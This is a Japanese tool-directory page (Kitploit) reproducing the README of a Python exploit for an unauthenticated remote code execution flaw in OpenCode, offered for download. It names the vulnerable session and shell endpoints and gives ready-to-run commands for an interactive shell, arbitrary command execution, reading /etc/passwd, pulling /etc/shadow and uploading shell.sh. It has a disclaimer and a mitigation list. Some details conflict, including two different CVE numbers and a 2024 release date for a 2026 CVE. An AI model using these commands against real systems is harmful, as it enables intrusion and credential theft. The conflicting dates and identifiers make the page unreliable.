Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-22812 — Python製のエクスプロイトツールで、OpenCode RCE(CVE-2026-22812)向けに、コマンド実行、ファイルの読み書き・アップロード・ダウンロード、および対話型シェルを提供し、許可されたペネトレーションテストを支援します。 | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Python製のエクスプロイトツールで、OpenCode RCE(CVE-2026-22812)向けに、コマンド実行、ファイルの読み書き・アップロード・ダウンロード、および対話型シェルを提供し、許可されたペネトレーションテストを支援します。

リポジトリを見る
217ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-22812

概要

OpenCode のリモートコード実行(RCE)脆弱性(v1.0.216 未満に影響)を悪用するための Python 製エクスプロイトツールです。このツールは、コマンド実行、ファイルの読み書き、ファイルのアップロード/ダウンロード、対話型シェルなど、複数の攻撃ベクトルを提供します。

免責事項

⚠️ 認可されたテスト専用 ⚠️

  • このツールは、正当なセキュリティテストおよび認可されたペネトレーションテストのみを目的としています
  • 所有しているシステム、または明示的な許可を得たシステムでのみ使用してください
  • 作者は、このツールの誤用または損害について一切の責任を負いません
  • コンピュータシステムへの不正アクセスは違法であり、法律で罰せられます

機能

  • 脆弱性検出: ターゲットが脆弱かどうかを確認
  • コマンド実行: ターゲット上で任意のコマンドを実行
  • ファイル操作: ファイルの読み取り、書き込み、アップロード、ダウンロード
  • 対話型シェル: タブ補完付きの完全な対話型シェル
  • システム偵察: システム情報の収集
  • プロキシサポート: HTTP プロキシ経由でトラフィックをルーティング
  • 統計追跡: エクスプロイト活動の監視

インストール

root@kitploit:~
# リポジトリのクローン
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# 依存関係のインストール
pip install requests urllib3

# 実行可能にする(任意)
chmod +x CVE-2026-22812.py

要件

  • Python 3.6+
  • requests ライブラリ
  • urllib3 ライブラリ

使用方法

root@kitploit:~
python3 CVE-2026-22812.py -t http://target:port [options]

基本的な例

root@kitploit:~
# ターゲットが脆弱かどうかを確認
python3 exploit.py -t http://10.0.0.1:4096 --check

# 対話型シェル
python3 exploit.py -t http://10.0.0.1:4096 -i

# 単一コマンドの実行
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# ファイルの読み取り
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# ファイルのアップロード
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# ファイルのダウンロード
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# システム情報の取得
python3 exploit.py -t http://10.0.0.1:4096 --info

# プロキシの使用(Burp Suite など)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

対話型シェルのコマンド

対話型シェル(-i フラグ)に入ると、以下のコマンドを使用できます:

root@kitploit:~
<command>                   シェルコマンドを実行
help                        ヘルプメニューを表示
exit                        シェルを終了
session                     セッション ID を表示
stats                       エクスプロイト統計を表示
read <file>                 ファイルの内容を読み取り
download <remote> <local>   ファイルをダウンロード
upload <local> <remote>     ファイルをアップロード
sysinfo                     システム情報を取得

脆弱性の詳細

  • CVE ID: CVE-2026-22812 / CVE-2026-22182
  • 製品: OpenCode
  • 影響を受けるバージョン: v1.0.216 未満
  • 脆弱性の種類: リモートコード実行
  • 攻撃ベクトル: ネットワーク
  • 認証: 不要

技術的詳細

この脆弱性はセッション管理エンドポイント(/session)に存在し、認証されていないユーザーがセッションを作成し、/session/{id}/shell エンドポイントを通じて任意のコマンドを実行できるようになります。

悪用されるエンドポイント:

  1. POST /session - セッションの作成
  2. POST /session/{id}/shell - コマンドの実行
  3. GET /file/content - ファイルの読み取り

緩和策

  1. OpenCode をバージョン ≥ v1.0.216 にアップグレード
  2. 適切な認証と認可を実装
  3. OpenCode インスタンスへのネットワークアクセスを制限
  4. 入力検証とサニタイズを実装
  5. Web アプリケーションファイアウォール(WAF)を使用

コード構造

root@kitploit:~
CVE-2026-22812.py
├── Colors クラス(ANSI カラーコード)
├── print_banner()(バナー表示)
├── Exploit クラス(メインのエクスプロイトロジック)
│   ├── __init__()(初期化)
│   ├── check_vuln()(脆弱性チェック)
│   ├── create_session()(セッション作成)
│   ├── exec_cmd()(コマンド実行)
│   ├── read_file()(ファイル読み取り)
│   ├── write_file()(ファイル書き込み)
│   ├── upload()(ファイルアップロード)
│   ├── download()(ファイルダウンロード)
│   ├── get_info()(システム情報)
│   ├── shell()(対話型シェル)
│   └── ヘルパーメソッド
└── main()(引数解析)

ライセンス

このツールは教育目的のみで公開されています。自己責任で使用してください。

作者

  • GitHub: 0xgh057r3c0n
  • ツール: CVE-2026-22812 エクスプロイトツール

貢献

  1. リポジトリをフォーク
  2. 機能ブランチを作成
  3. 変更をコミット
  4. ブランチにプッシュ
  5. プルリクエストを作成

謝辞

  • 脆弱性を発見したセキュリティ研究者
  • オープンソースコミュニティ
  • すべての貢献者とテスター

参考情報

  • OpenCode セキュリティアドバイザリ
  • CVE データベース
  • NVD エントリ

サポート

問題や質問がある場合は、以下の手順に従ってください:

  1. 既存の GitHub イシューを確認
  2. 詳細な説明を含む新しいイシューを作成
  3. ターゲット URL(可能な場合)とエラーメッセージを含める

バージョン履歴

  • v1.0.0(2024-01-20):初回リリース
    • 脆弱性検出
    • コマンド実行
    • ファイル操作
    • 対話型シェル
    • プロキシサポート
ツールをダウンロード